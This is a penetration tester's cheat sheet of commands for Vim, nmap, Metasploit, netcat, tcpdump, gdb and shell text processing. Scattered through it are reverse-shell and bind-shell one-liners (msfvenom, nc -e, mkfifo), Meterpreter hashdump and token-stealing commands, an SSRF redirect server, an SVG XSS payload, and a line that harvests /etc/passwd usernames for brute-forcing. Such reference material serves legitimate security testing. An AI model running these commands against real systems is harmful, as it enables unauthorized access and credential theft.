$ man

$ man ToC

Vi
Bash tricks
tar
recon ng
nmap
Metasploit
Netcat
Wireshark
Tcpdump
nc
OpenVAS
gdb
filter your ssh traffic
Cisco password:
Others
Bash quoting
Tcpdump
File parsing

:%!grep -v foo # Filter out unwanted lines

:%!sort -u # Remove duplicates

| vim - # Send output to vim

.* # Repeat the last step
    *CTRL+v # Vertical selection
    *10x # Delete the 10 following characters

10dw # Delete the 10 following words

6dd # Delete 10 lines

Bash tricks

Append a character at the end of every line of the file:

$ sed '/.*?/ ! s/$/new_suffix/' in.txt > out.txt

$ find . -type f -exec mv {} . \; # finds all files and moves them to the root (mac tested).

tar

tar -czvf out.tar.gz folder/ # compress folder
tar -xvf out.tar.gz # decompress archive

recon ng

> show modules
> use recon/domains-vulnerabilities/xssed
> set source google.com
> run

nmap

Normal scans

-sT TCP connect

-sS Stealth scan

Discovery scans

-sP Ping

-sL List Scan

-sO Protocol

-sV Probe open ports to determine service/version info

-sL List scan

Other scans

-sY SCTP init scan, scans new protocol STCP that combines UDP and TCP

-sA tcp ACK, open and closed ports will return RST, if firewall no reply sO IP protocol scan.

-sT Connect scan

-sA ACK scan

-sW Window scan

-sM Maimon scan

-sU UDP Scan

-sN TCP Null scan

Port Specification and Scan Order

-p Specify ports, e.g. -p80,443 or -p1-65535

-p U:PORT Scan UDP ports with Nmap, e.g. -p U:53

-F Fast mode, scans fewer ports than the default scan

OS Detection

-O Enable OS Detection

Timing and Performance

-T[0-5] Timing. Higher is faster

Firewalls IDS Evasion and Spoofing

-f; --mtu VALUE Fragment packets (optionally w/given MTU)

-D decoy1,decoy2,ME Cloak a scan with decoys

-S IP-ADDRESS Spoof source address

-e IFACE Use specified interface

--badsum Send packets with a bogus TCP/UDP/SCTP checksum

Misc Nmap Options

-A Enable OS detection, version detection, script scanning, and traceroute

-P0 Do not ping first

Update scripts:

$ nmap --script-updatedb

Scan all TCP and UDP Ports

$ nmap -v -sU -sS -p- -A -T4 ip

Nmap search through Nmap Scripts for a specific keyword

$  ls /usr/share/nmap/scripts/* | grep ftp

Metasploit

Starting metasploit

$ service postgesql start; update-rc.d postgresql enable; msfconsole; db_rebuild_cache

MSFconsole

Entry point for the framework

$ msfconsole

> help

against known vulnerabilities

> show exploits

Search a specific product

> search vsftp

Create a reverse shell, works for any format (php, asp, exe..):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f asp > shell.asp

modules available (DoS tools, port scanning, fuzzers..)

> show auxiliary

> show payloads
> show options
> show targets

> use payload/bla
> set RHOST 192..
> run

if you need the server to make a callback to you:

set LHOST collaborator.net

is the shell you get when you find RCE in a host.

> meterpeter

> screenshot

operating system version etc

> sysinfo

tries to elevate privileges

> use priv

Route all traffic to a specific IP through a session 2:

> route add 10.10.10.10 255.255.255.0 2

Common payloads

generic/shell_reverse_tcp
        windows/meterpreter/reverse_tcp

MSFcli

non interactive client.

$ mscli

Meterpeter

Create a meterpeter reverse shell (any language/format)

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f aspx > shell.aspx

Listen for a reverse shell:

> set PAYLOAD windows/meterpreter/reverse_tcp

Put session in background:

> background

List sessions

> sessions -l

Switch to session

> session -i 1

Token stealing

> use incognito
>list_tokens -u

>impersonate_token BOB\IWAM_BOB

>steal_token [PID]

Search files:

> meterpeter search -f *pass*.txt

Upload files

> upload local remote

Invoke a command shell

> shell

Get the hash from windows users:

> hashdump

Netcat

Listens for incoming connections

$ nc -nlvp 4444

Connects to a remote server

$ nc -nv 10.0.0.22 4444

Serves incorming.exe through 4444

$ nc -nlvp 4444 > incoming.exe

Binds shell

$ nc -nlvp 4444 -e cmd.exe

Opens a reverse shell (you connect to a machine that can bash into yours)

$ nc -nv 10.0.0.22 4444 -e /bin/bash

Wireshark

libpcap and wincap libraries.
network -> capture filters -> capture engine -> display filters
follow TCP stream

tcp.port == 21
ip.src == 10.43.54.65 or ip.dst == 10.43.54.65
ip.addr != 10.43.54.65

Find packets with specific flags set/unset:

tcp.flags.syn == 1
tcp.flags.push == 1
tcp.flags.reset == 0

Find packet containg string/filter:

CRTL+F

Find packet with specific sequence number:

tcp.seq == xxxx

Tcpdump

$ tcpdump -r file.pcap # saves output to file.pcap

$ tcpdump -n src host 10.10.10.10 # saves packages from 10.10.10.10

$ tcpdump -n dst host 10.10.10.10 # saves packages to 10.10.10.10

$ tcpdump -n port 81 # saves packages where port 81 was involved

$ tcpdump port not 22 # skips your ssh session traffic

$ tcpdump -vv port 80 or port 443 # http and https traffic

shell

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 0.0.0.0 1234 > /tmp/f

OpenVAS

$ apt-get update;  apt-get install openvas  openvas-setup 
netstat -tulpn

https://localhost:9392

gdb

disas main or disassemble main
b *0x00000000004008e2 # sets a breakpoint to a pos of memory
r or run # runs the program
x/s $esi # prints esi registers
x/s $rax # prints rax registers
info registers # prints all registers
set *(char*)0x0000000000400749=0x75 # changes instruction of this pos to jne
set *(char*)0x0000000000400749=0x74 # changes instruction of this pos to je
list win # shows line of win
bt # shows call stack
info locals # info about local variables
run # runs the app
b main # adds breakpoint in main
r # continues execution
disable 1 # disables break point
info frame # prints info about addrs
info functions # all functions
Display Register Values : (Decimal , Binary , Hex )

print /d -> Decimal
print /t -> Binary
print /x -> Hex

Print *EAX* as decimal:

(gdb) print /d $eax
$17 = 13

Display memory location, syntax:

x/nyz (Examine)
n -> Number of fields to display ==>
y -> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z -> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)

filter your ssh traffic

$ tcpdump -lt -i eth0 not $ host my.src.address and tcp port 22 $

Cisco password:

enable secret 5 $1$mERr$Q4J3cxRImm68KXqMDsLDs/

$1 #hash type (1 md5), (5 sha256)

mERr base 64 salt

Q4J3cxRImm68KXqMDsLDs hashed salt + pass

Others

Replace contents of files

$ find . -name watchdog.sh -exec sed -r -e 's/(^.*)-t 10 -i/-t 9 -i/g' {} \; # replace file contents

SSH using private key

$ ssh -i key host

Generate Ip range

$ seq -f "192.168.1.10.%g" 1 255

SSRF web server

$ while true ; do  echo -e "HTTP/1.1 301 Moved Permanently\r\nLocation: 127.0.0.1:22\r\n" | nc -vv -l -p 80  ; done

Svg XSS payload

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE svg [<!ENTITY elem "">]>
    <svg onload="alert(document.domain);" height="16" width="16">&elem;</svg>

Bash quoting

 # | Expression  | Result      | Comments
---+-------------+-------------+--------------------------------------------------------------------
 1 | "$a"        | apple       | variables are expanded inside ""
 2 | '$a'        | $a          | variables are not expanded inside ''
 3 | "'$a'"      | 'apple'     | '' has no special meaning inside ""
 4 | '"$a"'      | "$a"        | "" is treated literally inside ''
 5 | '\''        | **invalid** | can not escape a ' within ''; use "'" or $'\'' (ANSI-C quoting)
 6 | "red$arocks"| red         | $arocks does not expand $a; use ${a}rocks to preserve $a
 7 | "redapple$" | redapple$   | $ followed by no variable name evaluates to $
 8 | '\"'        | \"          | \ has no special meaning inside ''
 9 | "\'"        | '           | \' is interpreted inside ""
10 | "\""        | "           | \" is interpreted inside ""
11 | "*"         | *           | glob does not work inside "" or ''
12 | "\t\n"      | \t\n        | \t and \n have no special meaning inside "" or ''; use ANSI-C quoting
13 | "`echo hi`" | hi          | `` and $() are evaluated inside ""
14 | '`echo hi`' | `echo hi`   | `` and $() are not evaluated inside ''
15 | '${arr[0]}' | ${arr[0]}   | array access not possible inside ''
16 | "${arr[0]}" | apple       | array access works inside ""
17 | $'$a\''     | $a'         | single quotes can be escaped inside ANSI-C quoting
---+-------------+-------------+--------------------------------------------------------------------

Tcpdump

options: host, net, and port.
host: src, dst
Proto: tcp, udp, icmp, ah

File parsing

Print the 9th line of a file that matches a regex.

$ awk ‘$9 ~ /404/ { print }’ access.log

Get the usernames from */etc/passwd* and dump them into a file for bruteforcing

$ awk -F':' '{ print $1}' /etc/passwd > users.txt

Sort count and print line occurrences of a file

$ cat file | sort  | uniq -c | sort -n

Grep a regex and print only matched area

$ grep -E -o regex file